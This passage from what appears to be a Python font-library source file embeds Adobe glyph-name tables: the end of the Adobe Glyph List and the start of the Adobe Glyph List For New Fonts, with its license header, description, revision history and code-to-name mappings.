yikorean;3162
yinyang;262F
yiwnarmenian;0582
ymonospace;FF59
yod;05D9
yoddagesh;FB39
yoddageshhebrew;FB39
yodhebrew;05D9
yodyodhebrew;05F2
yodyodpatahhebrew;FB1F
yohiragana;3088
yoikorean;3189
yokatakana;30E8
yokatakanahalfwidth;FF96
yokorean;315B
yosmallhiragana;3087
yosmallkatakana;30E7
yosmallkatakanahalfwidth;FF6E
yotgreek;03F3
yoyaekorean;3188
yoyakorean;3187
yoyakthai;0E22
yoyingthai;0E0D
yparen;24B4
ypogegrammeni;037A
ypogegrammenigreekcmb;0345
yr;01A6
yring;1E99
ysuperior;02B8
ytilde;1EF9
yturned;028E
yuhiragana;3086
yuikorean;318C
yukatakana;30E6
yukatakanahalfwidth;FF95
yukorean;3160
yusbigcyrillic;046B
yusbigiotifiedcyrillic;046D
yuslittlecyrillic;0467
yuslittleiotifiedcyrillic;0469
yusmallhiragana;3085
yusmallkatakana;30E5
yusmallkatakanahalfwidth;FF6D
yuyekorean;318B
yuyeokorean;318A
yyabengali;09DF
yyadeva;095F
z;007A
zaarmenian;0566
zacute;017A
zadeva;095B
zagurmukhi;0A5B
zaharabic;0638
zahfinalarabic;FEC6
zahinitialarabic;FEC7
zahiragana;3056
zahmedialarabic;FEC8
zainarabic;0632
zainfinalarabic;FEB0
zakatakana;30B6
zaqefgadolhebrew;0595
zaqefqatanhebrew;0594
zarqahebrew;0598
zayin;05D6
zayindagesh;FB36
zayindageshhebrew;FB36
zayinhebrew;05D6
zbopomofo;3117
zcaron;017E
zcircle;24E9
zcircumflex;1E91
zcurl;0291
zdot;017C
zdotaccent;017C
zdotbelow;1E93
zecyrillic;0437
zedescendercyrillic;0499
zedieresiscyrillic;04DF
zehiragana;305C
zekatakana;30BC
zero;0030
zeroarabic;0660
zerobengali;09E6
zerodeva;0966
zerogujarati;0AE6
zerogurmukhi;0A66
zerohackarabic;0660
zeroinferior;2080
zeromonospace;FF10
zerooldstyle;F730
zeropersian;06F0
zerosuperior;2070
zerothai;0E50
zerowidthjoiner;FEFF
zerowidthnonjoiner;200C
zerowidthspace;200B
zeta;03B6
zhbopomofo;3113
zhearmenian;056A
zhebrevecyrillic;04C2
zhecyrillic;0436
zhedescendercyrillic;0497
zhedieresiscyrillic;04DD
zihiragana;3058
zikatakana;30B8
zinorhebrew;05AE
zlinebelow;1E95
zmonospace;FF5A
zohiragana;305E
zokatakana;30BE
zparen;24B5
zretroflexhook;0290
zstroke;01B6
zuhiragana;305A
zukatakana;30BA
# END
"""
_aglfnText = """\
# -----------------------------------------------------------
# Copyright 2002-2019 Adobe (http://www.adobe.com/).
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the
# following conditions are met:
#
# Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# Neither the name of Adobe nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# -----------------------------------------------------------
# Name: Adobe Glyph List For New Fonts
# Table version: 1.7
# Date: November 6, 2008
# URL: https://github.com/adobe-type-tools/agl-aglfn
#
# Description:
#
# AGLFN (Adobe Glyph List For New Fonts) provides a list of base glyph
# names that are recommended for new fonts, which are compatible with
# the AGL (Adobe Glyph List) Specification, and which should be used
# as described in Section 6 of that document. AGLFN comprises the set
# of glyph names from AGL that map via the AGL Specification rules to
# the semantically correct UV (Unicode Value). For example, "Asmall"
# is omitted because AGL maps this glyph name to the PUA (Private Use
# Area) value U+F761, rather than to the UV that maps from the glyph
# name "A." Also omitted is "ffi," because AGL maps this to the
# Alphabetic Presentation Forms value U+FB03, rather than decomposing
# it into the following sequence of three UVs: U+0066, U+0066, and
# U+0069. The name "arrowvertex" has been omitted because this glyph
# now has a real UV, and AGL is now incorrect in mapping it to the PUA
# value U+F8E6. If you do not find an appropriate name for your glyph
# in this list, then please refer to Section 6 of the AGL
# Specification.
#
# Format: three semicolon-delimited fields:
# (1) Standard UV or CUS UV--four uppercase hexadecimal digits
# (2) Glyph name--upper/lowercase letters and digits
# (3) Character names: Unicode character names for standard UVs, and
# descriptive names for CUS UVs--uppercase letters, hyphen, and
# space
#
# The records are sorted by glyph name in increasing ASCII order,
# entries with the same glyph name are sorted in decreasing priority
# order, the UVs and Unicode character names are provided for
# convenience, lines starting with "#" are comments, and blank lines
# should be ignored.
#
# Revision History:
#
# 1.7 [6 November 2008]
# - Reverted to the original 1.4 and earlier mappings for Delta,
# Omega, and mu.
# - Removed mappings for "afii" names. These should now be assigned
# "uni" names.
# - Removed mappings for "commaaccent" names. These should now be
# assigned "uni" names.
#
# 1.6 [30 January 2006]
# - Completed work intended in 1.5.
#
# 1.5 [23 November 2005]
# - Removed duplicated block at end of file.
# - Changed mappings:
# 2206;Delta;INCREMENT changed to 0394;Delta;GREEK CAPITAL LETTER DELTA
# 2126;Omega;OHM SIGN changed to 03A9;Omega;GREEK CAPITAL LETTER OMEGA
# 03BC;mu;MICRO SIGN changed to 03BC;mu;GREEK SMALL LETTER MU
# - Corrected statement above about why "ffi" is omitted.
#
# 1.4 [24 September 2003]
# - Changed version to 1.4, to avoid confusion with the AGL 1.3.
# - Fixed spelling errors in the header.
# - Fully removed "arrowvertex," as it is mapped only to a PUA Unicode
# value in some fonts.
#
# 1.1 [17 April 2003]
# - Renamed [Tt]cedilla back to [Tt]commaaccent.
#
# 1.0 [31 January 2003]
# - Original version.
# - Derived from the AGLv1.2 by:
# removing the PUA area codes;
# removing duplicate Unicode mappings; and
# renaming "tcommaaccent" to "tcedilla" and "Tcommaaccent" to "Tcedilla"
#
0041;A;LATIN CAPITAL LETTER A
00C6;AE;LATIN CAPITAL LETTER AE
01FC;AEacute;LATIN CAPITAL LETTER AE WITH ACUTE
00C1;Aacute;LATIN CAPITAL LETTER A WITH ACUTE
0102;Abreve;LATIN CAPITAL LETTER A WITH BREVE
00C2;Acircumflex;LATIN CAPITAL LETTER A WITH CIRCUMFLEX
00C4;Adieresis;LATIN CAPITAL LETTER A WITH DIAERESIS
00C0;Agrave;LATIN CAPITAL LETTER A WITH GRAVE
0391;Alpha;GREEK CAPITAL LETTER ALPHA
0386;Alphatonos;GREEK CAPITAL LETTER ALPHA WITH TONOS
0100;Amacron;LATIN CAPITAL LETTER A WITH MACRON
0104;Aogonek;LATIN CAPITAL LETTER A WITH OGONEK
00C5;Aring;LATIN CAPITAL LETTER A WITH RING ABOVE
01FA;Aringacute;LATIN CAPITAL LETTER A WITH RING ABOVE AND ACUTE
00C3;Atilde;LATIN CAPITAL LETTER A WITH TILDE
0042;B;LATIN CAPITAL LETTER B
0392;Beta;GREEK CAPITAL LETTER BETA
0043;C;LATIN CAPITAL LETTER C
0106;Cacute;LATIN CAPITAL LETTER C WITH ACUTE
010C;Ccaron;LATIN CAPITAL LETTER C WITH CARON
00C7;Ccedilla;LATIN CAPITAL LETTER C WITH CEDILLA
0108;Ccircumflex;LATIN CAPITAL LETTER C WITH CIRCUMFLEX
010A;Cdotaccent;LATIN CAPITAL LETTER C WITH DOT ABOVE
03A7;Chi;GREEK CAPITAL LETTER CHI
0044;D;LATIN CAPITAL LETTER D
010E;Dcaron;LATIN CAPITAL LETTER D WITH CARON
0110;Dcroat;LATIN CAPITAL LETTER D WITH STROKE
2206;Delta;INCREMENT
0045;E;LATIN CAPITAL LETTER E
00C9;Eacute;LATIN CAPITAL LETTER E WITH ACUTE
0114;Ebreve;LATIN CAPITAL LETTER E WITH BREVE
011A;Ecaron;LATIN CAPITAL LETTER E WITH CARON
00CA;Ecircumflex;LATIN CAPITAL LETTER E WITH CIRCUMFLEX
00CB;Edieresis;LATIN CAPITAL LETTER E WITH DIAERESIS
0116;Edotaccent;LATIN CAPITAL LETTER E WITH DOT ABOVE
00C8;Egrave;LATIN CAPITAL LETTER E WITH GRAVE
0112;Emacron;LATIN CAPITAL LETTER E WITH MACRON
014A;Eng;LATIN CAPITAL LETTER ENG
0118;Eogonek;LATIN CAPITAL LETTER E WITH OGONEK
0395;Epsilon;GREEK CAPITAL LETTER EPSILON
0388;Epsilontonos;GREEK CAPITAL LETTER EPSILON WITH TONOS
0397;Eta;GREEK CAPITAL LETTER ETA
0389;Etatonos;GREEK CAPITAL LETTER ETA WITH TONOS
00D0;Eth;LATIN CAPITAL LETTER ETH
20AC;Euro;EURO SIGN
0046;F;LATIN CAPITAL LETTER F
0047;G;LATIN CAPITAL LETTER G
0393;Gamma;GREEK CAPITAL LETTER GAMMA
011E;Gbreve;LATIN CAPITAL LETTER G WITH BREVE
01E6;Gcaron;LATIN CAPITAL LETTER G WITH CARON
011C;Gcircumflex;LATIN CAPITAL LETTER G WITH CIRCUMFLEX
0120;Gdotaccent;LATIN CAPITAL LETTER G WITH DOT ABOVE
0048;H;LATIN CAPITAL LETTER H
25CF;H18533;BLACK CIRCLE
25AA;H18543;BLACK SMALL SQUARE
25AB;H18551;WHITE SMALL SQUARE
25A1;H22073;WHITE SQUARE
0126;Hbar;LATIN CAPITAL LETTER H WITH STROKE
0124;Hcircumflex;LATIN CAPITAL LETTER H WITH CIRCUMFLEX
0049;I;LATIN CAPITAL LETTER I
0132;IJ;LATIN CAPITAL LIGATURE IJ
00CD;Iacute;LATIN CAPITAL LETTER I WITH ACUTE
012C;Ibreve;LATIN CAPITAL LETTER I WITH BREVE
00CE;Icircumflex;LATIN CAPITAL LETTER I WITH CIRCUMFLEX
00CF;Idieresis;LATIN CAPITAL LETTER I WITH DIAERESIS
0130;Idotaccent;LATIN CAPITAL LETTER I WITH DOT ABOVE
2111;Ifraktur;BLACK-LETTER CAPITAL I
00CC;Igrave;LATIN CAPITAL LETTER I WITH GRAVE
012A;Imacron;LATIN CAPITAL LETTER I WITH MACRON
012E;Iogonek;LATIN CAPITAL LETTER I WITH OGONEK
0399;Iota;GREEK CAPITAL LETTER IOTA
03AA;Iotadieresis;GREEK CAPITAL LETTER IOTA WITH DIALYTIKA
038A;Iotatonos;GREEK CAPITAL LETTER IOTA WITH TONOS
0128;Itilde;LATIN CAPITAL LETTER I WITH TILDE
004A;J;LATIN CAPITAL LETTER J
0134;Jcircumflex;LATIN CAPITAL LETTER J WITH CIRCUMFLEX
004B;K;LATIN CAPITAL LETTER K
039A;Kappa;GREEK CAPITAL LETTER KAPPA
004C;L;LATIN CAPITAL LETTER L
0139;Lacute;LATIN CAPITAL LETTER L WITH ACUTE
039B;Lambda;GREEK CAPITAL LETTER LAMDA
013D;Lcaron;LATIN CAPITAL LETTER L WITH CARON
013F;Ldot;LATIN CAPITAL LETTER L WITH MIDDLE DOT
0141;Lslash;LATIN CAPITAL LETTER L WITH STROKE
004D;M;LATIN CAPITAL LETTER M
039C;Mu;GREEK CAPITAL LETTER MU
004E;N;LATIN CAPITAL LETTER N
0143;Nacute;LATIN CAPITAL LETTER N WITH ACUTE
0147;Ncaron;LATIN CAPITAL LETTER N WITH CARON
00D1;Ntilde;LATIN CAPITAL LETTER N WITH TILDE
039D;Nu;GREEK CAPITAL LETTER NU
004F;O;LATIN CAPITAL LETTER O
0152;OE;LATIN CAPITAL LIGATURE OE
00D3;Oacute;LATIN CAPITAL LETTER O WITH ACUTE
014E;Obreve;LATIN CAPITAL LETTER O WITH BREVE
00D4;Ocircumflex;LATIN CAPITAL LETTER O WITH CIRCUMFLEX
00D6;Odieresis;LATIN CAPITAL LETTER O WITH DIAERESIS
00D2;Ograve;LATIN CAPITAL LETTER O WITH GRAVE
01A0;Ohorn;LATIN CAPITAL LETTER O WITH HORN
0150;Ohungarumlaut;LATIN CAPITAL LETTER O WITH DOUBLE ACUTE
014C;Omacron;LATIN CAPITAL LETTER O WITH MACRON
2126;Omega;OHM SIGN
038F;Omegatonos;GREEK CAPITAL LETTER OMEGA WITH TONOS
039F;Omicron;GREEK CAPITAL LETTER OMICRON
038C;Omicrontonos;GREEK CAPITAL LETTER OMICRON WITH TONOS
00D8;Oslash;LATIN CAPITAL LETTER O WITH STROKE
01FE;Oslashacute;LATIN CAPITAL LETTER O WITH STROKE AND ACUTE
00D5;Otilde;LATIN CAPITAL LETTER O WITH TILDE
0050;P;LATIN CAPITAL LETTER P
03A6;Phi;GREEK CAPITAL LETTER PHI
03A0;Pi;GREEK CAPITAL LETTER PI
03A8;Psi;GREEK CAPITAL LETTER PSI
0051;Q;LATIN CAPITAL LETTER Q
0052;R;LATIN CAPITAL LETTER R
0154;Racute;LATIN CAPITAL LETTER R WITH ACUTE
0158;Rcaron;LATIN CAPITAL LETTER R WITH CARON
211C;Rfraktur;BLACK-LETTER CAPITAL R
03A1;Rho;GREEK CAPITAL LETTER RHO
0053;S;LATIN CAPITAL LETTER S
250C;SF010000;BOX DRAWINGS LIGHT DOWN AND RIGHT
2514;SF020000;BOX DRAWINGS LIGHT UP AND RIGHT
2510;SF030000;BOX DRAWINGS LIGHT DOWN AND LEFT
2518;SF040000;BOX DRAWINGS LIGHT UP AND LEFT
253C;SF050000;BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
252C;SF060000;BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
2534;SF070000;BOX DRAWINGS LIGHT UP AND HORIZONTAL
251C;SF080000;BOX DRAWINGS LIGHT VERTICAL AND RIGHT
2524;SF090000;BOX DRAWINGS LIGHT VERTICAL AND LEFT
2500;SF100000;BOX DRAWINGS LIGHT HORIZONTAL
2502;SF110000;BOX DRAWINGS LIGHT VERTICAL
2561;SF190000;BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
2562;SF200000;BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
2556;SF210000;BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
2555;SF220000;BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
2563;SF230000;BOX DRAWINGS DOUBLE VERTICAL AND LEFT
2551;SF240000;BOX DRAWINGS DOUBLE VERTICAL
2557;SF250000;BOX DRAWINGS DOUBLE DOWN AND LEFT
255D;SF260000;BOX DRAWINGS DOUBLE UP AND LEFT
255C;SF270000;BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
255B;SF280000;BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
255E;SF360000;BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
255F;SF370000;BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
255A;SF380000;BOX DRAWINGS DOUBLE UP AND RIGHT
2554;SF390000;BOX DRAWINGS DOUBLE DOWN AND RIGHT
2569;SF400000;BOX DRAWINGS DOUBLE UP AND HORIZONTAL
2566;SF410000;BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
2560;SF420000;BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
2550;SF430000;BOX DRAWINGS DOUBLE HORIZONTAL
256C;SF440000;BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
2567;SF450000;BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
2568;SF460000;BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
2564;SF470000;BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
2565;SF480000;BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
2559;SF490000;BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
2558;SF500000;BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
2552;SF510000;BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
2553;SF520000;BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
256B;SF530000;BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
256A;SF540000;BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
015A;Sacute;LATIN CAPITAL LETTER S WITH ACUTE
0160;Scaron;LATIN CAPITAL LETTER S WITH CARON
015E;Scedilla;LATIN CAPITAL LETTER S WITH CEDILLA
015C;Scircumflex;LATIN CAPITAL LETTER S WITH CIRCUMFLEX
03A3;Sigma;GREEK CAPITAL LETTER SIGMA
0054;T;LATIN CAPITAL LETTER T
03A4;Tau;GREEK CAPITAL LETTER TAU
0166;Tbar;LATIN CAPITAL LETTER T WITH STROKE
0164;Tcaron;LATIN CAPITAL LETTER T WITH CARON
0398;Theta;GREEK CAPITAL LETTER THETA
00DE;Thorn;LATIN CAPITAL LETTER THORN
0055;U;LATIN CAPITAL LETTER U
00DA;Uacute;LATIN CAPITAL LETTER U WITH ACUTE
016C;Ubreve;LATIN CAPITAL LETTER U WITH BREVE
00DB;Ucircumflex;LATIN CAPITAL LETTER U WITH CIRCUMFLEX
00DC;Udieresis;LATIN CAPITAL LETTER U WITH DIAERESIS
00D9;Ugrave;LATIN CAPITAL LETTER U WITH GRAVE
01AF;Uhorn;LATIN CAPITAL LETTER U WITH HORN
0170;Uhungarumlaut;LATIN CAPITAL LETTER U WITH DOUBLE ACUTE
016A;Umacron;LATIN CAPITAL LETTER U WITH MACRON
0172;Uogonek;LATIN CAPITAL LETTER U WITH OGONEK
03A5;Upsilon;GREEK CAPITAL LETTER UPSILON
03D2;Upsilon1;GREEK UPSILON WITH HOOK SYMBOL
03AB;Upsilondieresis;GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA
038E;Upsilontonos;GREEK CAPITAL LETTER UPSILON WITH TONOS
016E;Uring;LATIN CAPITAL LETTER U WITH RING ABOVE
0168;Utilde;LATIN CAPITAL LETTER U WITH TILDE
0056;V;LATIN CAPITAL LETTER V
0057;W;LATIN CAPITAL LETTER W
1E82;Wacute;LATIN CAPITAL LETTER W WITH ACUTE
0174;Wcircumflex;LATIN CAPITAL LETTER W WITH CIRCUMFLEX
1E84;Wdieresis;LATIN CAPITAL LETTER W WITH DIAERESIS
1E80;Wgrave;LATIN CAPITAL LETTER W WITH GRAVE
0058;X;LATIN CAPITAL LETTER X
039E;Xi;GREEK CAPITAL LETTER XI
0059;Y;LATIN CAPITAL LETTER Y
00DD;Yacute;LATIN CAPITAL LETTER Y WITH ACUTE
0176;Ycircumflex;LATIN CAPITAL LETTER Y WITH CIRCUMFLEX
0178;Ydieresis;LATIN CAPITAL LETTER Y WITH DIAERESIS
1EF2;Ygrave;LATIN CAPITAL LETTER Y WITH GRAVE
005A;Z;LATIN CAPITAL LETTER Z
0179;Zacute;LATIN CAPITAL LETTER Z WITH ACUTE
017D;Zcaron;LATIN CAPITAL LETTER Z WITH CARON
017B;Zdotaccent;LATIN CAPITAL LETTER Z WITH DOT ABOVE
0396;Zeta;GREEK CAPITAL LETTER ZETA
0061;a;LATIN SMALL LETTER A
00E1;aacute;LATIN SMALL LETTER A WITH ACUTE
0103;abreve;LATIN SMALL LETTER A WITH BREVE
00E2;acircumflex;LATIN SMALL LETTER A WITH CIRCUMFLEX
00B4;acute;ACUTE ACCENT
0301;acutecomb;COMBINING ACUTE ACCENT
00E4;adieresis;LATIN SMALL LETTER A WITH DIAERESIS
00E6;ae;LATIN SMALL LETTER AE
01FD;aeacute;LATIN SMALL LETTER AE WITH ACUTE
00E0;agrave;LATIN SMALL LETTER A WITH GRAVE
2135;aleph;ALEF SYMBOL
03B1;alpha;GREEK SMALL LETTER ALPHA
03AC;alphatonos;GREEK SMALL LETTER ALPHA WITH TONOS
0101;amacron;LATIN SMALL LETTER A WITH MACRON
0026;ampersand;AMPERSAND
2220;angle;ANGLE
2329;angleleft;LEFT-POINTING ANGLE BRACKET
232A;angleright;RIGHT-POINTING ANGLE BRACKET
0387;anoteleia;GREEK ANO TELEIA
0105;aogonek;LATIN SMALL LETTER A WITH OGONEK
2248;approxequal;ALMOST EQUAL TO
00E5;aring;LATIN SMALL LETTER A WITH RING ABOVE
01FB;aringacute;LATIN SMALL LETTER A WITH RING ABOVE AND ACUTE
2194;arrowboth;LEFT RIGHT ARROW
21D4;arrowdblboth;LEFT RIGHT DOUBLE ARROW
21D3;arrowdbldown;DOWNWARDS DOUBLE ARROW
21D0;arrowdblleft;LEFTWARDS DOUBLE ARROW
21D2;arrowdblright;RIGHTWARDS DOUBLE ARROW
21D1;arrowdblup;UPWARDS DOUBLE ARROW
2193;arrowdown;DOWNWARDS ARROW
2190;arrowleft;LEFTWARDS ARROW
2192;arrowright;RIGHTWARDS ARROW
2191;arrowup;UPWARDS ARROW
2195;arrowupdn;UP DOWN ARROW
21A8;arrowupdnbse;UP DOWN ARROW WITH BASE
005E;asciicircum;CIRCUMFLEX ACCENT
007E;asciitilde;TILDE
002A;asterisk;ASTERISK
2217;asteriskmath;ASTERISK OPERATOR
0040;at;COMMERCIAL AT
00E3;atilde;LATIN SMALL LETTER A WITH TILDE
0062;b;LATIN SMALL LETTER B
005C;backslash;REVERSE SOLIDUS
007C;bar;VERTICAL LINE
03B2;beta;GREEK SMALL LETTER BETA
2588;block;FULL BLOCK
007B;braceleft;LEFT CURLY BRACKET
007D;braceright;RIGHT CURLY BRACKET
005B;bracketleft;LEFT SQUARE BRACKET
005D;bracketright;RIGHT SQUARE BRACKET
02D8;breve;BREVE
00A6;brokenbar;BROKEN BAR
2022;bullet;BULLET
0063;c;LATIN SMALL LETTER C
0107;cacute;LATIN SMALL LETTER C WITH ACUTE
02C7;caron;CARON
21B5;carriagereturn;DOWNWARDS ARROW WITH CORNER LEFTWARDS
010D;ccaron;LATIN SMALL LETTER C WITH CARON
00E7;ccedilla;LATIN SMALL LETTER C WITH CEDILLA
0109;ccircumflex;LATIN SMALL LETTER C WITH CIRCUMFLEX
010B;cdotaccent;LATIN SMALL LETTER C WITH DOT ABOVE
00B8;cedilla;CEDILLA
00A2;cent;CENT SIGN
03C7;chi;GREEK SMALL LETTER CHI
25CB;circle;WHITE CIRCLE
2297;circlemultiply;CIRCLED TIMES
2295;circleplus;CIRCLED PLUS
02C6;circumflex;MODIFIER LETTER CIRCUMFLEX ACCENT
2663;club;BLACK CLUB SUIT
003A;colon;COLON
20A1;colonmonetary;COLON SIGN
002C;comma;COMMA
2245;congruent;APPROXIMATELY EQUAL TO
00A9;copyright;COPYRIGHT SIGN
00A4;currency;CURRENCY SIGN
0064;d;LATIN SMALL LETTER D
2020;dagger;DAGGER
2021;daggerdbl;DOUBLE DAGGER
010F;dcaron;LATIN SMALL LETTER D WITH CARON
0111;dcroat;LATIN SMALL LETTER D WITH STROKE
00B0;degree;DEGREE SIGN
03B4;delta;GREEK SMALL LETTER DELTA
2666;diamond;BLACK DIAMOND SUIT
00A8;dieresis;DIAERESIS
0385;dieresistonos;GREEK DIALYTIKA TONOS
00F7;divide;DIVISION SIGN
2593;dkshade;DARK SHADE
2584;dnblock;LOWER HALF BLOCK
0024;dollar;DOLLAR SIGN
20AB;dong;DONG SIGN
02D9;dotaccent;DOT ABOVE
0323;dotbelowcomb;COMBINING DOT BELOW
0131;dotlessi;LATIN SMALL LETTER DOTLESS I
22C5;dotmath;DOT OPERATOR
0065;e;LATIN SMALL LETTER E
00E9;eacute;LATIN SMALL LETTER E WITH ACUTE
0115;ebreve;LATIN SMALL LETTER E WITH BREVE
011B;ecaron;LATIN SMALL LETTER E WITH CARON
00EA;ecircumflex;LATIN SMALL LETTER E WITH CIRCUMFLEX
00EB;edieresis;LATIN SMALL LETTER E WITH DIAERESIS
0117;edotaccent;LATIN SMALL LETTER E WITH DOT ABOVE
00E8;egrave;LATIN SMALL LETTER E WITH GRAVE
0038;eight;DIGIT EIGHT
2208;element;ELEMENT OF
2026;ellipsis;HORIZONTAL ELLIPSIS
0113;emacron;LATIN SMALL LETTER E WITH MACRON
2014;emdash;EM DASH
2205;emptyset;EMPTY SET
2013;endash;EN DASH
014B;eng;LATIN SMALL LETTER ENG
0119;eogonek;LATIN SMALL LETTER E WITH OGONEK
03B5;epsilon;GREEK SMALL LETTER EPSILON
03AD;epsilontonos;GREEK SMALL LETTER EPSILON WITH TONOS
003D;equal;EQUALS SIGN
2261;equivalence;IDENTICAL TO
212E;estimated;ESTIMATED SYMBOL
03B7;eta;GREEK SMALL LETTER ETA
03AE;etatonos;GREEK SMALL LETTER ETA WITH TONOS
00F0;eth;LATIN SMALL LETTER ETH
0021;exclam;EXCLAMATION MARK
203C;exclamdbl;DOUBLE EXCLAMATION MARK
00A1;exclamdown;INVERTED EXCLAMATION MARK
2203;existential;THERE EXISTS
0066;f;LATIN SMALL LETTER F
2640;female;FEMALE SIGN
2012;figuredash;FIGURE DASH
25A0;filledbox;BLACK SQUARE
25AC;filledrect;BLACK RECTANGLE
0035;five;DIGIT FIVE
215D;fiveeighths;VULGAR FRACTION FIVE EIGHTHS
0192;florin;LATIN SMALL LETTER F WITH HOOK
0034;four;DIGIT FOUR
2044;fraction;FRACTION SLASH
20A3;franc;FRENCH FRANC SIGN
0067;g;LATIN SMALL LETTER G
03B3;gamma;GREEK SMALL LETTER GAMMA
011F;gbreve;LATIN SMALL LETTER G WITH BREVE
01E7;gcaron;LATIN SMALL LETTER G WITH CARON
011D;gcircumflex;LATIN SMALL LETTER G WITH CIRCUMFLEX
0121;gdotaccent;LATIN SMALL LETTER G WITH DOT ABOVE
00DF;germandbls;LATIN SMALL LETTER SHARP S
2207;gradient;NABLA
0060;grave;GRAVE ACCENT
0300;gravecomb;COMBINING GRAVE ACCENT
003E;greater;GREATER-THAN SIGN
2265;greaterequal;GREATER-THAN OR EQUAL TO
00AB;guillemotleft;LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
00BB;guillemotright;RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
2039;guilsinglleft;SINGLE LEFT-POINTING ANGLE QUOTATION MARK
203A;guilsinglright;SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
0068;h;LATIN SMALL LETTER H
0127;hbar;LATIN SMALL LETTER H WITH STROKE
0125;hcircumflex;LATIN SMALL LETTER H WITH CIRCUMFLEX
2665;heart;BLACK HEART SUIT
0309;hookabovecomb;COMBINING HOOK ABOVE
2302;house;HOUSE
02DD;hungarumlaut;DOUBLE ACUTE ACCENT
002D;hyphen;HYPHEN-MINUS
0069;i;LATIN SMALL LETTER I
00ED;iacute;LATIN SMALL LETTER I WITH ACUTE
012D;ibreve;LATIN SMALL LETTER I WITH BREVE
00EE;icircumflex;LATIN SMALL LETTER I WITH CIRCUMFLEX
00EF;idieresis;LATIN SMALL LETTER I WITH DIAERESIS
00EC;igrave;LATIN SMALL LETTER I WITH GRAVE
0133;ij;LATIN SMALL LIGATURE IJ
012B;imacron;LATIN SMALL LETTER I WITH MACRON
221E;infinity;INFINITY
222B;integral;INTEGRAL
2321;integralbt;BOTTOM HALF INTEGRAL
2320;integraltp;TOP HALF INTEGRAL
2229;intersection;INTERSECTION
25D8;invbullet;INVERSE BULLET
25D9;invcircle;INVERSE WHITE CIRCLE
263B;invsmileface;BLACK SMILING FACE
012F;iogonek;LATIN SMALL LETTER I WITH OGONEK
03B9;iota;GREEK SMALL LETTER IOTA
03CA;iotadieresis;GREEK SMALL LETTER IOTA WITH DIALYTIKA
0390;iotadieresistonos;GREEK SMALL LETTER IOTA WITH DIALYTIKA AND TONOS
03AF;iotatonos;GREEK SMALL LETTER IOTA WITH TONOS
0129;itilde;LATIN SMALL LETTER I WITH TILDE
006A;j;LATIN SMALL LETTER J
0135;jcircumflex;LATIN SMALL LETTER J WITH CIRCUMFLEX
006B;k;LATIN SMALL LETTER K
03BA;kappa;GREEK SMALL LETTER KAPPA
0138;kgreenlandic;LATIN SMALL LETTER KRA
006C;l;LATIN SMALL LETTER L
013A;lacute;LATIN SMALL LETTER L WITH ACUTE
03BB;lambda;GREEK SMALL LETTER LAMDA
013E;lcaron;LATIN SMALL LETTER L WITH CARON
0140;ldot;LATIN SMALL LETTER L WITH MIDDLE DOT
003C;less;LESS-THAN SIGN
2264;lessequal;LESS-THAN OR EQUAL TO
258C;lfblock;LEFT HALF BLOCK
20A4;lira;LIRA SIGN
2227;logicaland;LOGICAL AND
00AC;logicalnot;NOT SIGN
2228;logicalor;LOGICAL OR
017F;longs;LATIN SMALL LETTER LONG S
25CA;lozenge;LOZENGE
0142;lslash;LATIN SMALL LETTER L WITH STROKE
2591;ltshade;LIGHT SHADE
006D;m;LATIN SMALL LETTER M
00AF;macron;MACRON
2642;male;MALE SIGN
2212;minus;MINUS SIGN
2032;minute;PRIME
00B5;mu;MICRO SIGN
00D7;multiply;MULTIPLICATION SIGN
266A;musicalnote;EIGHTH NOTE
266B;musicalnotedbl;BEAMED EIGHTH NOTES
006E;n;LATIN SMALL LETTER N
0144;nacute;LATIN SMALL LETTER N WITH ACUTE
0149;napostrophe;LATIN SMALL LETTER N PRECEDED BY APOSTROPHE
